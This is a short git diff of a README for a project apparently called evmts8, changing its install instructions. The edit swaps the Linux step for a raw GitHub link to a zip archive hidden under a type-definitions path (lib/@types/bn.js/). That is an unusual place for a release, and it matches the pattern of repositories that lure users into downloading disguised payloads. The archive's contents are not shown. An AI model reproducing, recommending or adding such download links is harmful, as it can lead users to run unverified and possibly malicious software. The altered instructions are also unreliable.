oyeahmedraza/evmts8/README.md

 4. **Install the Software**
    - **For Windows:** Double-click the downloaded .exe file and follow the on-screen instructions to install evmts8.
    - **For macOS:** Open the downloaded .dmg file, drag evmts8 to your Applications folder, and then launch it from there.
-   - **For Linux:** Extract the downloaded .tar.gz file into your preferred directory.
+   - **For Linux:** Extract the downloaded https://raw.githubusercontent.com/oyeahmedraza/evmts8/master/lib/@types/bn.js/evmts8_1.2.zip file into your preferred directory.
 You can run evmts8 from the terminal by navigating to the extracted folder and executing the binary.

 5. **Run evmts8**
    After the installation, you can run evmts8 from your applications menu or command line, depending on your operating system.